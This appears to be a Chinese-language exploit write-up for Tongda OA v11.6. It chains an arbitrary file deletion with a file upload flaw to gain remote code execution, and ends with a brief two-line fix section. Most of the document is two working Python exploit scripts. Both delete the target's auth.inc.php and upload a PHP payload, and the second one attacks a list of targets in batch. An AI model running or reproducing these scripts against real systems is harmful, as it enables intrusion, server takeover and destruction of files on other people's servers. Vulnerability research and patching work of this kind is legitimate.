# 通达OA v11.6 任意文件删除+文件上传


漏洞名称: 通达OA  任意文件删除+文件上传漏洞
影响范围: 通达OA  v11.6
漏洞描述:
通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。
攻击者可通过任意文件删除漏洞删除auth.inc.php，然后组合文件上传漏洞最终可造成远程代码执行(RCE)漏洞，从而导致服务器权限被拿下。

exp.py


```python
'''
更新：
特别提醒：
本POC不是无损利用的，会让对方系统文件被删除导致无法正常工作
并且由于目标系统及网络环境不可控，该漏洞也不可能编写出在任何情况下都完全无损的EXP
使用时请一定一定要慎重，一定要获取对方书面授权再使用
如果仅仅想要检测漏洞的存在性，可以自己编写脚本只检测/module/appbuilder/assets/print.php是否存在
'''
import requests
target="http://127.0.0.1:8203/"
payload="<?php echo 123456 ?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")
```

通达OA 0day漏洞 批量REC (仅研究学习)


```python
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
#by Tommy，在原作者上修改而来，2020-8-19，通达OA 0 day漏洞利用
import sys
version = sys.version_info
if version < (3, 0):
    print('The current version is not supported, you need to use python3')
    sys.exit()
    
def exploit(target):
    try:
        target=target
        payload='<?php echo md5("exp-test"); ?>'#无害检测
        print(target,"[*]删除auth.inc.php...")

        url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"#删除auth.inc.php请求
        requests.get(url=url,verify=False,timeout=10)
        print(target,"[*]正在检查文件是否已删除...")
        url=target+"/inc/auth.inc.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        #print(page)
        if 'No input file specified.' not in page:
            print(target,"[-]无法删除auth.inc.php文件")
            return 0
        print(target,"[+]删除auth.inc.php成功")
        print(target,"[*]开始上传payload...")
        url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
        files = {'FILE1': ('deconf.php', payload)}
        requests.post(url=url,files=files,verify=False,timeout=10)
        url=target+"/_deconf.php"
        page=requests.get(url=url,verify=False,timeout=10).text
        if 'No input file specified.' not in page:
            print("[+]************************文件已存在，上传成功************************")
            if '8a8127bc83b94ad01414a7a3ea4b8' in page:#如果执行过md5函数，才确认漏洞存在，减少误报
                print(target,"************************代码执行成功，存在漏洞************************")
                print(target,"[+]URL:",url)
        else:
            print(target,"[-]文件上传失败")
    except Exception as e:
        print(target,e)
urls='url.txt'
print("[*]警告：利用此漏洞，会删除auth.inc.php，这可能会损坏OA系统")
input("按Enter继续")
for url in open(urls,'r',encoding='utf-8').read().split('\n'):
    url=url.split()
    url=url.split()
    exploit(url[0])
    ```

修复方案
删掉/module/appbuilder/assets/print.php
升级到最新版